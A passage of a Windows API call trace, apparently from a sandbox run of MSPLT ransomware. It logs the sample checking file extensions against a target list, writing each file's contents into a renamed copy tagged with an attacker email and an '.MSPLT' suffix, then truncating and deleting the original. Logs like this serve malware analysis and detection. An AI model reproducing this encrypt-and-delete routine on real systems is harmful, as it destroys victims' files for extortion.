(lpString1=".bz2", lpString2=".dll") returned -1 [0172.297] lstrlenW (lpString=".7z") returned 3 [0172.297] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0172.298] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0172.298] lstrlenW (lpString=".dbf") returned 4 [0172.298] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0172.298] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0172.298] lstrlenW (lpString=".1cd") returned 4 [0172.298] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0172.298] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0172.298] lstrlenW (lpString=".jpg") returned 4 [0172.298] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0172.298] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0172.298] lstrlenW (lpString="SetupResources.dll") returned 18 [0172.298] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0172.298] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x369ff14 | out: lpFileSize=0x369ff14*=18776) returned 1 [0172.298] CloseHandle (hObject=0x37c) returned 1 [0172.298] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll")) returned 0x80 [0172.299] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.299] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0172.299] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.299] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.299] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0172.306] GetLastError () returned 0x0 [0172.306] ReadFile (in: hFile=0x37c, lpBuffer=0x3c5e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x369fecc, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesRead=0x369fecc*=0x4958, lpOverlapped=0x0) returned 1 [0172.312] WriteFile (in: hFile=0x36c, lpBuffer=0x3c5e020*, nNumberOfBytesToWrite=0x4960, lpNumberOfBytesWritten=0x369fc94, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesWritten=0x369fc94*=0x4960, lpOverlapped=0x0) returned 1 [0172.313] ReadFile (in: hFile=0x37c, lpBuffer=0x3c5e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x369fecc, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesRead=0x369fecc*=0x0, lpOverlapped=0x0) returned 1 [0172.314] WriteFile (in: hFile=0x36c, lpBuffer=0x3c5e020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x369fc94, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesWritten=0x369fc94*=0xf8, lpOverlapped=0x0) returned 1 [0172.314] SetEndOfFile (hFile=0x36c) returned 1 [0172.314] CloseHandle (hObject=0x36c) returned 1 [0172.736] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.736] SetEndOfFile (hFile=0x37c) returned 1 [0172.737] CloseHandle (hObject=0x37c) returned 1 [0172.737] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0172.737] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll")) returned 1 [0172.737] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0172.737] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0172.737] lstrlenW (lpString=".doc") returned 4 [0172.737] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0172.737] lstrlenW (lpString=".docx") returned 5 [0172.737] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0172.738] lstrlenW (lpString=".pdf") returned 4 [0172.738] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0172.738] lstrlenW (lpString=".xls") returned 4 [0172.738] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0172.738] lstrlenW (lpString=".xlsx") returned 5 [0172.738] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0172.738] lstrlenW (lpString=".ppt") returned 4 [0172.738] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0172.738] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0172.738] lstrlenW (lpString=".zip") returned 4 [0172.738] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0172.738] lstrlenW (lpString=".rar") returned 4 [0172.738] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0172.738] lstrlenW (lpString=".bz2") returned 4 [0172.738] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0172.738] lstrlenW (lpString=".7z") returned 3 [0172.738] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0172.738] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0172.738] lstrlenW (lpString=".dbf") returned 4 [0172.738] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0172.738] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0172.738] lstrlenW (lpString=".1cd") returned 4 [0172.738] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0172.738] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0172.738] lstrlenW (lpString=".jpg") returned 4 [0172.738] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0172.739] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0172.739] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0172.739] lstrlenW (lpString=".doc") returned 4 [0172.739] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0172.739] lstrlenW (lpString=".docx") returned 5 [0172.739] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0172.739] lstrlenW (lpString=".pdf") returned 4 [0172.739] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0172.739] lstrlenW (lpString=".xls") returned 4 [0172.739] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0172.739] lstrlenW (lpString=".xlsx") returned 5 [0172.739] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0172.739] lstrlenW (lpString=".ppt") returned 4 [0172.739] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0172.739] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0172.739] lstrlenW (lpString=".zip") returned 4 [0172.739] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0172.739] lstrlenW (lpString=".rar") returned 4 [0172.739] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0172.739] lstrlenW (lpString=".bz2") returned 4 [0172.739] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0172.739] lstrlenW (lpString=".7z") returned 3 [0172.740] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0172.740] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0172.740] lstrlenW (lpString=".dbf") returned 4 [0172.740] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0172.740] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0172.740] lstrlenW (lpString=".1cd") returned 4 [0172.740] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0172.740] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0172.740] lstrlenW (lpString=".jpg") returned 4 [0172.740] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0172.740] lstrcmpiW (lpString1=".ico", lpString2=".MSPLT") returned -1 [0172.740] lstrlenW (lpString="Rotate4.ico") returned 11 [0172.740] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0173.010] GetFileSizeEx (in: hFile=0x35c, lpFileSize=0x369ff14 | out: lpFileSize=0x369ff14*=894) returned 1 [0173.010] CloseHandle (hObject=0x35c) returned 1 [0173.010] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico")) returned 0x80 [0173.010] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0173.010] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0173.011] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.011] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.011] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x34c [0173.011] GetLastError () returned 0x0 [0173.011] ReadFile (in: hFile=0x35c, lpBuffer=0x3c5e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x369fecc, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesRead=0x369fecc*=0x37e, lpOverlapped=0x0) returned 1 [0173.017] WriteFile (in: hFile=0x34c, lpBuffer=0x3c5e020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x369fc94, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesWritten=0x369fc94*=0x380, lpOverlapped=0x0) returned 1 [0173.018] ReadFile (in: hFile=0x35c, lpBuffer=0x3c5e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x369fecc, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesRead=0x369fecc*=0x0, lpOverlapped=0x0) returned 1 [0173.018] WriteFile (in: hFile=0x34c, lpBuffer=0x3c5e020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x369fc94, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesWritten=0x369fc94*=0xea, lpOverlapped=0x0) returned 1 [0173.018] SetEndOfFile (hFile=0x34c) returned 1 [0173.018] CloseHandle (hObject=0x34c) returned 1 [0173.019] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.019] SetEndOfFile (hFile=0x35c) returned 1 [0173.020] CloseHandle (hObject=0x35c) returned 1 [0173.020] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0173.020] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico")) returned 1 [0173.021] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0173.021] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0173.021] lstrlenW (lpString=".doc") returned 4 [0173.021] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0173.021] lstrlenW (lpString=".docx") returned 5 [0173.021] lstrcmpiW (lpString1=".docx", lpString2="4.ico") returned -1 [0173.021] lstrlenW (lpString=".pdf") returned 4 [0173.021] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0173.021] lstrlenW (lpString=".xls") returned 4 [0173.021] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0173.021] lstrlenW (lpString=".xlsx") returned 5 [0173.021] lstrcmpiW (lpString1=".xlsx", lpString2="4.ico") returned -1 [0173.021] lstrlenW (lpString=".ppt") returned 4 [0173.021] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0173.021] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0173.021] lstrlenW (lpString=".zip") returned 4 [0173.021] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0173.021] lstrlenW (lpString=".rar") returned 4 [0173.021] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0173.021] lstrlenW (lpString=".bz2") returned 4 [0173.021] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0173.021] lstrlenW (lpString=".7z") returned 3 [0173.021] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0173.021] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0173.021] lstrlenW (lpString=".dbf") returned 4 [0173.021] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0173.021] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0173.021] lstrlenW (lpString=".1cd") returned 4 [0173.021] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0173.021] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0173.021] lstrlenW (lpString=".jpg") returned 4 [0173.021] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0173.022] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0173.022] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0173.022] lstrlenW (lpString=".doc") returned 4 [0173.022] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0173.022] lstrlenW (lpString=".docx") returned 5 [0173.022] lstrcmpiW (lpString1=".docx", lpString2="4.ico") returned -1 [0173.022] lstrlenW (lpString=".pdf") returned 4 [0173.022] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0173.022] lstrlenW (lpString=".xls") returned 4 [0173.022] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0173.022] lstrlenW (lpString=".xlsx") returned 5 [0173.022] lstrcmpiW (lpString1=".xlsx", lpString2="4.ico") returned -1 [0173.022] lstrlenW (lpString=".ppt") returned 4 [0173.022] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0173.022] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0173.022] lstrlenW (lpString=".zip") returned 4 [0173.022] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0173.022] lstrlenW (lpString=".rar") returned 4 [0173.022] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0173.022] lstrlenW (lpString=".bz2") returned 4 [0173.022] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0173.022] lstrlenW (lpString=".7z") returned 3 [0173.022] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0173.022] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0173.022] lstrlenW (lpString=".dbf") returned 4 [0173.022] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0173.022] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0173.022] lstrlenW (lpString=".1cd") returned 4 [0173.022] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0173.022] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0173.022] lstrlenW (lpString=".jpg") returned 4 [0173.022] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0173.022] lstrcmpiW (lpString1=".ico", lpString2=".MSPLT") returned -1 [0173.022] lstrlenW (lpString="Rotate8.ico") returned 11 [0173.023] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0173.034] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x369ff14 | out: lpFileSize=0x369ff14*=894) returned 1 [0173.034] CloseHandle (hObject=0x378) returned 1 [0173.034] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico")) returned 0x80 [0173.034] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0173.034] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0173.034] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.034] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.034] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0173.036] GetLastError () returned 0x0 [0173.036] ReadFile (in: hFile=0x378, lpBuffer=0x3c5e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x369fecc, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesRead=0x369fecc*=0x37e, lpOverlapped=0x0) returned 1 [0173.042] WriteFile (in: hFile=0x364, lpBuffer=0x3c5e020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x369fc94, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesWritten=0x369fc94*=0x380, lpOverlapped=0x0) returned 1 [0173.043] ReadFile (in: hFile=0x378, lpBuffer=0x3c5e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x369fecc, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesRead=0x369fecc*=0x0, lpOverlapped=0x0) returned 1 [0173.043] WriteFile (in: hFile=0x364, lpBuffer=0x3c5e020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x369fc94, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesWritten=0x369fc94*=0xea, lpOverlapped=0x0) returned 1 [0173.043] SetEndOfFile (hFile=0x364) returned 1 [0174.128] CloseHandle (hObject=0x364) returned 1 [0174.129] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.129] SetEndOfFile (hFile=0x378) returned 1 [0174.130] CloseHandle (hObject=0x378) returned 1 [0174.130] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0174.131] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico")) returned 1 [0174.131] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0174.131] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0174.131] lstrlenW (lpString=".doc") returned 4 [0174.131] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0174.131] lstrlenW (lpString=".docx") returned 5 [0174.132] lstrcmpiW (lpString1=".docx", lpString2="8.ico") returned -1 [0174.132] lstrlenW (lpString=".pdf") returned 4 [0174.132] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0174.132] lstrlenW (lpString=".xls") returned 4 [0174.132] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0174.132] lstrlenW (lpString=".xlsx") returned 5 [0174.132] lstrcmpiW (lpString1=".xlsx", lpString2="8.ico") returned -1 [0174.132] lstrlenW (lpString=".ppt") returned 4 [0174.132] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0174.132] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0174.132] lstrlenW (lpString=".zip") returned 4 [0174.132] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0174.132] lstrlenW (lpString=".rar") returned 4 [0174.132] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0174.132] lstrlenW (lpString=".bz2") returned 4 [0174.132] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0174.132] lstrlenW (lpString=".7z") returned 3 [0174.132] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0174.132] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0174.132] lstrlenW (lpString=".dbf") returned 4 [0174.132] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0174.132] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0174.132] lstrlenW (lpString=".1cd") returned 4 [0174.132] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0174.132] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0174.132] lstrlenW (lpString=".jpg") returned 4 [0174.132] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0174.133] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0174.133] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0174.133] lstrlenW (lpString=".doc") returned 4 [0174.133] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0174.133] lstrlenW (lpString=".docx") returned 5 [0174.133] lstrcmpiW (lpString1=".docx", lpString2="8.ico") returned -1 [0174.133] lstrlenW (lpString=".pdf") returned 4 [0174.133] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0174.133] lstrlenW (lpString=".xls") returned 4 [0174.133] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0174.133] lstrlenW (lpString=".xlsx") returned 5 [0174.133] lstrcmpiW (lpString1=".xlsx", lpString2="8.ico") returned -1 [0174.133] lstrlenW (lpString=".ppt") returned 4 [0174.133] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0174.133] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0174.133] lstrlenW (lpString=".zip") returned 4 [0174.133] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0174.133] lstrlenW (lpString=".rar") returned 4 [0174.133] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0174.133] lstrlenW (lpString=".bz2") returned 4 [0174.133] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0174.133] lstrlenW (lpString=".7z") returned 3 [0174.133] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0174.133] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0174.133] lstrlenW (lpString=".dbf") returned 4 [0174.133] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0174.133] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0174.134] lstrlenW (lpString=".1cd") returned 4 [0174.134] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0174.134] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0174.134] lstrlenW (lpString=".jpg") returned 4 [0174.134] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0174.135] lstrcmpiW (lpString1=".ico", lpString2=".MSPLT") returned -1 [0174.135] lstrlenW (lpString="warn.ico") returned 8 [0174.135] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0174.136] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x369ff14 | out: lpFileSize=0x369ff14*=10134) returned 1 [0174.136] CloseHandle (hObject=0x378) returned 1 [0174.136] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico")) returned 0x80 [0174.136] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.136] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0174.136] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.136] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.136] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: 